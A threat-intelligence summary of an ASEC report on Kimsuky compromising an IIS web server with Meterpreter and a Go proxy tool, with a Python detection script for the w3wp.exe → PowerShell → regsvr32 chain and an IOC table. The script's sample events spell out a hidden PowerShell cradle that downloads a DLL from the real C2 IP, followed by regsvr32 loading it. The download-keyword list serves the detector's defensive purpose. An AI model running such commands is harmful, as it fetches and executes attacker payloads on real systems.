Kimsuky Group Using Meterpreter to Attack Web Servers

2023-05-21 Ahnlab

https://asec.ahnlab.com/en/53046/


ASEC describes Kimsuky attacks against a Windows IIS web server at a Korean construction company, a shift from the group's usual document-based spear phishing to exploitation of poorly managed or unpatched web servers. After compromising the IIS process, the actor ran PowerShell to download a Metasploit Meterpreter backdoor from 45.58.52[.]82 and then used Meterpreter to install an additional proxy tool. Both the Meterpreter stager and the proxy tool were written in Go, and the DLL payload was executed through regsvr32.exe, a method ASEC says matches prior Kimsuky tradecraft. The proxy component relayed IP and port pairs and used an "aPpLe" communication signature, likely to support later RDP access to the compromised server. For defenders, the pivot in this chain is the IIS worker process (w3wp.exe) spawning a shell that fetches a payload, followed by regsvr32.exe loading a DLL from outside the system directories.
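The process chain above lends itself to a simple process-creation hunt. The following is an added example written for this page, not code from ASEC or from the malware: it scores Sysmon-style process-creation events for an IIS worker spawning a shell, a download cradle in the command line, the report's C2 address, and regsvr32.exe loading a DLL from a non-system path. The sample events, the URL path and the file name update.dll are constructed for illustration; only the IP comes from the IOC table.

```python
"""Hunt for the w3wp.exe -> PowerShell -> regsvr32.exe chain in process-creation events.

Added example for this page; the events below are constructed, not real telemetry.
Field names loosely follow Sysmon Event ID 1 (ParentImage, Image, CommandLine).
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # ParentImage: full path of the parent process
    image: str    # Image: full path of the created process
    cmdline: str  # CommandLine as logged


# C2 address from the ASEC report's IOC table (the only real indicator used here).
KNOWN_BAD_IPS = {"45.58.52.82"}

WEB_WORKERS = {"w3wp.exe"}                          # IIS worker process
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SYSTEM_DIRS = (r"c:\windows\system32" + "\\", r"c:\windows\syswow64" + "\\")

# Common PowerShell / LOLBin download cradles; extend to taste.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|"
    r"certutil.*urlcache|start-bitstransfer"
)
# First argument ending in .dll, quoted or not (regsvr32 /s "path" or regsvr32 /s path).
DLL_ARG_RE = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)', re.I)


def _base(path: str) -> str:
    # ntpath handles backslash paths regardless of the host OS.
    return ntpath.basename(path).lower()


def _mentions_ip(cmd: str, ip: str) -> bool:
    # Boundary check so 45.58.52.82 does not match inside 145.58.52.82 or 45.58.52.820.
    return re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", cmd) is not None


def check_event(ev: ProcEvent) -> list[str]:
    """Return the list of rule names the event triggers (empty if benign)."""
    parent, image, cmd = _base(ev.parent), _base(ev.image), ev.cmdline.lower()
    findings = []
    if parent in WEB_WORKERS and image in SHELLS:
        findings.append("web_worker_spawned_shell")
    if image in SHELLS and DOWNLOAD_RE.search(cmd):
        findings.append("download_cradle")
    if any(_mentions_ip(cmd, ip) for ip in KNOWN_BAD_IPS):
        findings.append("known_bad_ip")
    if image == "regsvr32.exe":
        m = DLL_ARG_RE.search(ev.cmdline)
        if m:
            dll = (m.group(1) or m.group(2)).lower()
            # Relative paths are flagged too: the DLL is not demonstrably under System32.
            if not dll.startswith(SYSTEM_DIRS):
                findings.append("regsvr32_nonsystem_dll")
    return findings


def hunt(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, findings) for every event that triggers at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := check_event(ev))]


# Constructed sample telemetry: two malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(
        parent=r"C:\Windows\System32\inetsrv\w3wp.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r'''powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://45.58.52.82/update.dll','C:\ProgramData\update.dll')"''',
    ),
    ProcEvent(
        parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        image=r"C:\Windows\System32\regsvr32.exe",
        cmdline=r"regsvr32.exe /s C:\ProgramData\update.dll",
    ),
    ProcEvent(  # benign: re-registering a system DLL from an interactive session
        parent=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\regsvr32.exe",
        cmdline=r"regsvr32.exe /s C:\Windows\System32\mshtml.dll",
    ),
    ProcEvent(  # benign: admin running a cmdlet, no download, no web-worker parent
        parent=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline="powershell.exe Get-Service W3SVC",
    ),
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
```

The first rule alone is the high-signal one on a web server: w3wp.exe has no business launching PowerShell or cmd.exe, so it is worth alerting on even without a download cradle or known IOC. The regsvr32 rule will fire on legitimate software installers that register DLLs under Program Files, so in production it is better paired with the parent-process check than run on its own.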

Indicators of Compromise

Type   Value                               First Seen   Last Seen
IPv4   45.58.52.82                         2023-05-15   2023-11-01
HASH   6b2062e61bcb46ce5ff19b329ce31b03    2023-05-15   2023-05-21
HASH   000130a373ea4085b87b97a0c7000c86    2023-05-15   2023-05-21

(The hash values are 32 hexadecimal characters, i.e. MD5.)
